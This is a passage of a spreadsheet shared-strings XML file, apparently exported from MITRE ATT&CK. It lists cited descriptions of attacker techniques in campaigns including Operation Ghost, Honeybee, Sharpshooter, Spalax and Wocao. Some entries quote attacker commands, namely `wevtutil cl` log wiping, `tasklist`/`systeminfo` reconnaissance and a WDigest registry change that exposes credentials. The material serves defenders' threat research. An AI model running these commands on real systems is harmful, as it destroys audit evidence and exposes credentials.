    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Visual Basic scripts.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--bc0704ff-406d-4be2-90ef-6a667041365f</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used social media platforms to hide communications to C2 servers.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--0d7e0555-3176-4ebe-b067-6e557e9040a9</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used stolen administrator credentials for lateral movement on compromised networks.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--0a154ef3-859f-4f13-b5c9-9bd0e91864f0</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) registered domains for use in C2 including some crafted to appear as existing legitimate domains.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--7360bacd-7a75-401a-b97e-b9bd6a2fbe42</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</si>
  <si>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</si>
  <si>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relationship--8a6f7d54-3165-4fd2-a2f8-a6357d231192</t>
  </si>
  <si>
    <t>For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) registered Twitter accounts to host C2 nodes.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--afaafa9d-6c93-4116-94c2-6ff11a304ed8</t>
  </si>
  <si>
    <t>During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used steganography to hide payloads inside valid images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--c09f73f8-f350-457c-a492-8cd820b00074</t>
  </si>
  <si>
    <t>During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used steganography to hide the communications between the implants and their C&amp;C servers.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--42868389-76f1-4dbf-9b7e-f657d6c8e0cc</t>
  </si>
  <si>
    <t>During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used WMI event subscriptions to establish persistence for malware.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ad63da4a-163d-49b4-b923-f4df799ab183</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uses zip to pack collected files before exfiltration.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--973ed739-22d9-433f-ba63-f4881639a22d</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--a88fe386-79eb-48d0-a982-033b6f75845a</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--5b6f04b3-9178-45af-be77-bdde4cf47db1</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected data from compromised hosts.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--a9062634-d5c3-4154-bea0-e4e76821d944</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), malicious files were decoded prior to execution.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--f813e8ab-96d7-4880-a3c2-50e164d4bd66</t>
  </si>
  <si>
    <t>For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--989a5b4d-14d3-4942-8326-91d677e4d38a</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors registered domains for C2.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--44bfcd86-2fa2-4e00-a9af-ab66d4d834cd</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), attackers created email addresses to register for a free account for a control server used for the implants.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--02838a73-1e42-4fda-a27b-044d14f303d9</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uploaded stolen files to their C2 servers.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--69e152de-4cf5-416b-a52b-c6a067f1789e</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--3b4aaacf-d721-4bad-a64e-37d48c6b847d</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors had the ability to use FTP for C2.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--9d7fb3cf-ccee-4f04-b7ef-ee42c320e513</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a malicious DLL to search for files with specific keywords.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--15fd646c-172b-4458-945a-69a07a5648bb</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors downloaded additional malware and malicious scripts onto a compromised host.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--c9d15fcf-d9f2-4f03-aabf-0e84523efc2b</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), stolen data was copied into a text file using the format `From &lt;COMPUTER-NAME&gt; (&lt;Month&gt;-&lt;Day&gt; &lt;Hour&gt;-&lt;Minute&gt;-&lt;Second&gt;).txt` prior to compression, encoding, and exfiltration.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--3c3646c8-56a5-443a-a71f-a32ea6269750</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors relied on a victim to enable macros within a malicious Word document.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--be9e89ef-de70-44e3-b3cb-73844f069ac4</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors modified the MaoCheng dropper so its icon appeared as a Word document.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--ff7ecfd6-bbe0-4fc6-9ea2-551ff2359157</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--bc1bee0f-2e60-452d-8e11-3ba3993ebbd9</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used batch files that modified registry keys.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--7af7bfc3-7b1b-41aa-b162-47c222390815</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--28427b29-2088-44f7-8acd-5df104dcb8ee</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used Base64 to encode files with a custom key.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--45803290-efab-46d3-873d-0c4f19f5e406</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist &gt; %temp%\temp.ini`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--e169d920-59ab-4a07-928e-858b878fd7bc</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), at least one identified persona was used to register for a free account for a control server.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--b923a6b3-acae-4ecf-bb56-63188d0e4553</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors ran &lt;code&gt;sc start&lt;/code&gt; to start the COMSysApp as part of the service hijacking and &lt;code&gt;sc stop&lt;/code&gt; to stop and reconfigure the COMSysApp.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--968911f0-2158-4c76-9fab-562a00ecc418</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a batch file that modified the COMSysApp service to load a malicious ipnet.dll payload and to load a DLL into the `svchost.exe` process.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--981648bc-e5b1-46b3-adf6-92caae84cfa4</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo &gt; %temp%\ temp.ini`.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--8b6f5eed-f21e-41db-a858-32bb0d12e593</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a Visual Basic script embedded within a Word document to download an implant.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--d36067ad-c612-46bb-b857-bb2d74f8f3c2</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), various implants used batch scripting and `cmd.exe` for execution.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t>relationship--826301cd-9f66-4e5d-a63a-8b0283f1e2fe</t>
  </si>
  <si>
    <t>During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors installed DLLs and backdoors as Windows services.(Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>relationship--a9468e2e-1525-4311-8f11-d63b5d6b4e58</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors sent malicious Word OLE documents to victims.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--14acc004-9b77-4a4a-b31d-a8eea459b4bb</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), additional payloads were downloaded after a target was infected with a first-stage downloader.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--ba150ca6-eb41-460a-87c7-049fac78c5cf</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors relied on victims executing malicious Microsoft Word or PDF files.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t>relationship--d7836be5-6c99-4a14-90ca-e342455516ab</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the [Rising Sun](https://attack.mitre.org/software/S0448) modular backdoor.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--caa820b8-5a7b-4704-88d9-380efff5a7a3</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors installed [Rising Sun](https://attack.mitre.org/software/S0448) in the Startup folder and disguised it as `mssync.exe`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--f9dc35b9-5cf9-4dbf-a1fd-698c95c047c5</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA()`, `GetProcAddress()`, and `CreateProcessA()`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--87bcab2c-d776-432e-b553-e482cadf4369</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.(Citation: Threatpost New Op Sharpshooter Data March 2019)    </t>
  </si>
  <si>
    <t>relationship--9e784751-c08e-43d8-957a-7d9a35e1cf05</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the ExpressVPN service to hide their location.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>relationship--fd3fde9b-3e7b-4e74-baff-94dc573c8366</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), a first-stage downloader installed [Rising Sun](https://attack.mitre.org/software/S0448) to `%Startup%\mssync.exe` on a compromised host.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t>relationship--b5baa306-e027-4000-9338-0d9df55c5040</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors compromised a server they used as part of the campaign's infrastructure.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>relationship--26bac510-efd4-499c-8272-3cf186d3b4e3</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors staged malicious files on Dropbox and other websites.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--68f0beb9-ce3e-44ae-af4d-516c22aa3cf4</t>
  </si>
  <si>
    <t>During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used a VBA macro to execute a simple downloader that installed [Rising Sun](https://attack.mitre.org/software/S0448).(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--ada86d8c-2c88-442d-8f7a-d9e53937a3f2</t>
  </si>
  <si>
    <t>For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used Dropbox to host lure documents and their first-stage downloader.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>relationship--7396416a-39cf-4a41-b04b-79172bd032b0</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used Nullsoft Scriptable Install System (NSIS) scripts to install malware.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--2b4b6861-7143-4155-aaac-60213a314abd</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers and droppers to decrypt malicious payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--25446e74-d461-4113-8ff9-9d6984696680</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors registered hundreds of domains using Duck DNS and DNS Exit.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--168c9371-c88c-45bf-9256-df78683685a2</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1e04ed60-7e43-4bad-a4c2-462b0b001dda</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.(Citation: ESET Operation Spalax Jan 2021) </t>
  </si>
  <si>
    <t>relationship--48cff69b-577c-4837-b894-95b19f255134</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to click on a malicious link distributed via phishing emails.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--3445ad37-1738-45c3-aabd-dcc048d2ad2d</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained malware, including [Remcos](https://attack.mitre.org/software/S0332), [njRAT](https://attack.mitre.org/software/S0385), and AsyncRAT.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1ae7391e-c622-45ee-8f8d-dca29b8bfea8</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used XOR-encrypted payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--d6de484e-a1f6-43cb-a506-ec4888e69bdd</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used `rundll32.exe` to execute malicious installers.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--b7f5a141-2db6-4f76-b3d7-bbd665035f84</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--3da56da6-08fe-406b-bd0d-cd4f72dd67f4</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--85b4d635-f5f4-4f4f-abc2-31203cad496d</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails to victims that contained a malicious link.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--386d6f27-a0a6-44c9-bd03-8a332c5ce9e2</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--1aad8f36-aec7-4210-8edb-7ad3dd14f5ed</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors obtained packers such as CyaX.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--13a41ddf-24f2-4c73-a047-7093f94a2573</t>
  </si>
  <si>
    <t>For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--3de46cc5-5049-4105-8fcc-ede3f51f30c5</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--3ff416c3-63dd-4050-82f9-fcf4820a7b12</t>
  </si>
  <si>
    <t>During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used OneDrive and MediaFire to host payloads.(Citation: ESET Operation Spalax Jan 2021)</t>
  </si>
  <si>
    <t>relationship--3bdacd96-1c94-4af2-b0b3-d44542c31ccd</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors archived collected files with WinRAR, prior to exfiltration.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--6239c9a5-5ab9-425d-a767-0d4e6262a598</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' proxy implementation "Agent" upgraded the socket in use to a TLS socket.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--0f8086c2-5432-455f-8012-201aed337725</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a script to collect information about the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--26088143-9fdc-4fb5-aa04-27ea21836da0</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--e36a58ff-f436-41de-a5bb-ac9748f9ee38</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected clipboard data in plaintext.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--5093ddae-6bc9-401e-b35f-9f3139efafd0</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--c0a4bcc3-8e3c-4f92-8b87-db70483e10e4</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002)'s DCSync to dump credentials from the memory of the targeted system.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>relationship--b4decb48-0877-418c-83cc-9967b369f5b2</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors encrypted IP addresses used for "Agent" proxy hops with RC4.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--80a8cd03-8f65-41fb-803a-64d92f9f1522</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors exfiltrated files and directories of interest from the targeted system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--4f6975b8-e16e-47ba-b241-b2267c5da4ef</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell to add and delete rules in the Windows firewall.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--ab6646bd-2b05-4c04-b6ee-0c0250352e76</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `net` command to retrieve information about domain accounts.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>relationship--8d43c2da-0d5e-478a-aacb-b9da651854ce</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used domain credentials, including domain admin, for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--94a6e104-9afd-4271-af39-6ab02eb53dfd</t>
  </si>
  <si>
    <t>For [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors registered email accounts to use during the campaign.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--27257b64-c32c-49cd-a4ce-f804c251829d</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the XServer backdoor to exfiltrate data.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--a778d83c-5452-49ff-87dd-dbd3ef0d380f</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--3a41f311-3961-4446-ad71-2a6f4e3561ec</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used stolen credentials to connect to the victim's network via VPN.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--e132dd40-7779-44dc-9e4a-74514381407c</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</si>
  <si>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</si>
  <si>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relationship--7e26e90e-79b1-45ab-94dd-ea7b35cffbf8</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gathered a recursive directory listing to find files and directories of interest.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--9627b2de-6420-480f-add5-312622eb957c</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors targeted people based on their organizational roles and privileges.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--96797e47-8984-40f8-ac55-af9fd0fecf55</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors edited variable names within the [Impacket](https://attack.mitre.org/software/S0357) suite to avoid automated detection.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--b71e1e23-5fc2-46af-ab0b-afa442c24b66</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors downloaded additional files to the infected system.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--ef203c63-b93c-413a-83ed-4785399f3a51</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors proxied traffic through multiple infected systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--9a462c0e-a60e-4983-8839-1f0e41cc133a</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a Visual Basic script that checked for internet connectivity.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--88231281-0f0d-4655-b083-a90faf9056fe</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</si>
  <si>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</si>
  <si>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relationship--827cbddc-3e19-4aff-a27a-5cce63812d44</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors obtained the password for the victim's password manager via a custom keylogger.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--034a2bc9-62a9-413f-b167-0b348928eba0</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used ProcDump to dump credentials from memory.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--02a05d88-504c-4b79-bc55-1174b02e62c2</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used SMB to copy files to and from target systems.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--839d6bf7-6a63-48c0-8433-0d8d6c7ea61f</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used local account credentials found during the intrusion for lateral movement and privilege escalation.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--f2064ee3-66e3-4856-a376-e34b2ec9f90f</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors staged archived files in a temporary directory prior to exfiltration.(Citation: FoxIT Wocao December 2019) </t>
  </si>
  <si>
    <t>relationship--3f564288-8695-4cbc-a8b9-813cb67e0f1e</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the command `net localgroup administrators` to list all administrators part of a local group.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--664d1aaf-eb98-4683-bc57-1a19934d934a</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors developed their own custom webshells to upload to compromised servers.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--107d896b-a618-42fe-a453-76bc4b7d7330</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors renamed some tools and executables to appear as legitimate programs.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--a90a5b4d-b677-4a69-8fa0-feab294c9daf</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled).(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--98b39362-d743-49be-b07e-748b19e12158</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom collection method to intercept two-factor authentication soft tokens.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--381a628b-5401-43d0-853a-c2b0dbce83c3</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed commands through the installed web shell via [Tor](https://attack.mitre.org/software/S0183) exit nodes.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>relationship--3d02f381-1402-430e-aacd-5e9350df2505</t>
  </si>
  <si>
    <t>During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
